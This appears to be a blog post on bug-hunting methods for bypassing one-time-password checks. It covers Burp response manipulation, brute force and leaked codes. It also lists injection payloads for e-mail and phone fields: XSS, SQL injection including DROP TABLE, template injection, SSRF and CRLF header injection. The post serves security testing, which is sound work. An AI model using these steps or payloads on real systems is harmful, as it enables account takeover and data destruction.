OTP Bypassing and Vulnerabilities from E-Mail fields.

Akash Venky
4 min readDec 23, 2022

--

What is Authentication?

Authentication is a process of verifying the identity of a user, process, or device, often as a prerequisite to allowing access to resources in an information system.

………………OTP Bypassing Methods……………….

Compulsory Checks

  1. Check for default OTP — 111111, 123456, 000000,99999 etc
  2. Check for Special Characters: ####,****,&&&&&& etc
  3. Check if otp has been leaked in response (Capture the request in burp suite and )check on DO-INTERCEPT the request)
  4. Check if old OTP is still valid

OTP Bypass on Register account via Response manipulation

  1. Register account with mobile number and request for OTP.
  2. Enter incorrect OTP and capture the request in Burpsuite.
  3. Do intercept response to this request and forward the request.
  4. response will be {“verificationStatus”:false,”mobile”:+91 97xxxx7x7",”profileId”:”334551"}
  5. Change this response to {“verificationStatus”:true,”mobile”:+91 97xxxx7x7",”profileId”:”334551"}
  6. And forward the response and observe that you will login inside the application

Next Method:

  1. Register 2 accounts with any 2 mobile number(first enter right otp)
  2. Intercept your request
  3. click on action -> Do intercept -> intercept response to this request.
  4. check what the message will display like status:1
  5. Follow the same procedure with other account but this time enter wrong otp
  6. Intercept respone to the request
  7. See the message like you get status:0
  8. Change status to 1 i.e, status:1 and forward the request if you logged in means you just done authentication bypass.

OTP Getting Leaked In Response

To test this enter any random otp and intercept the request and the response of that request through burp proxy and notice that otp is getting leaked in the response.

OTP Bypass Through Inspect Element

  1. To test this head over to the page which asks for an otp, in that page right click on the continue button or any other button which when clicked will process the request for otp.
  2. Go to inspect element. Under inspect element check for any function which validates the otp. One such function is checkOTP(event).
  3. Type that event in the console. When we click on the arrow it will open a file in the debugger where you will see the otp sent to your mobile number.

Bypassing OTP in registration forms by repeating the form submission multiple times using repeater

  1. Create an account with a non-existing phone number
  2. Intercept the Request in BurpSuite
  3. Send the request to the repeater and forward
  4. Go to Repeater tab and change the non-existent phone number to your phone number
  5. If you got an OTP to your phone, try using that OTP to register that non-existent number

No Rate Limit/ BruteForce Attacks.

  1. Create an Account
  2. When Application Ask you For the OTP( One-time password ), Enter wrong OTP and Capture this Request In Burp.
  3. Send This Request into intruder and set up the payload on otp Value.
  4. If there is no Rate Limit then wait for 200 Status Code (Sometimes 302)
  5. If you get 200 ok or 302 Found Status Code that means you’ve bypass OTP

Ignored parts of an email where developer fails to implement controls

The Symbols: +,-,{},(),^,#,! are the rare occasions can be used for tagging and ignored by most e-mail servers.

  1. Meow.bow+evil@domain.com → meow.bow@domain.com
  2. Meow.bow+evil1@domain.com → meow.bow@domain.com
  3. Meow.bow+evil2@domain.com → meow.bow@domain.com

Also noted that few times comments between parentheses () at the beginning or the end will also be ignored

  • E.g. meow.bow(evil)@domain.com → meow.bow@domain.com

Phone Number payloads

This input field is where attacker has given an option to submit only numbers as an input field to the servers. attacker can manipulate this input field in several ways such as,

To find XSS:

+9739343777;phone-context=<script>alert(1)</script>

To find Parameter Pollution:

1.+91 97xxxx7x7;phone-context=&phone-context=+9739343777

2.+91 97xxxx7x7;ext=1;ext=2

To find Sql Injection:

+91 97xxxx7x7;phone-context=’ OR 1=1; —

To find Template Injection:

+91 97xxxx7x7;phone-context={{4*4}}{{5+5}}

To find SSRF:

+91 97xxxx7x7;phone-context=burpcollaborator.net

XSS from EMails fields Payloads

This is the input field were attacker is given an option to submit the email_id. The attacker as several ways were he can use the loopholes on input validations.

To find Template Injection on emailField

  1. “<%=7*7%>”@domain.com

2. Test+(${{5*5}})@domain.com

To find SQL Inection on EmailField

  1. “‘ OR 1=1 — “‘@domain.com

2. “mail’); DROP TABLE users; — “@domain.com

To find SSRF on Email Field

  1. meow@bow123.burpcollaborator.net

2. meow@[127.0.0.1]

3. meow@[http://localhost.com]

To find Parameter Pollution

  1. victim@email=attacker@domain.com

To find Header Injection

  1. “recipent@test.com>\r\nRCPT TO:<victim+”@test.com

2. “%0d%0aContent-Length:%200%0d%0a%0d%0a”@domain.com

To find Inputfield abusing

  1. %@domain.com

2. #@domain.com

3. !@domain.com

4. *@domain.com

To find XSS on Email fields abusing

“<svg/onload=alert(1)>”@x.y

Suggestions are most welcomed,

Please write a mail to Akash.venky091@gmail.com, Also you can follow me here for more updates on Security, Ethical hacking at Akash Venky or contact me @ https://www.linkedin.com/in/akash-h-c-4a4090a7/

--

--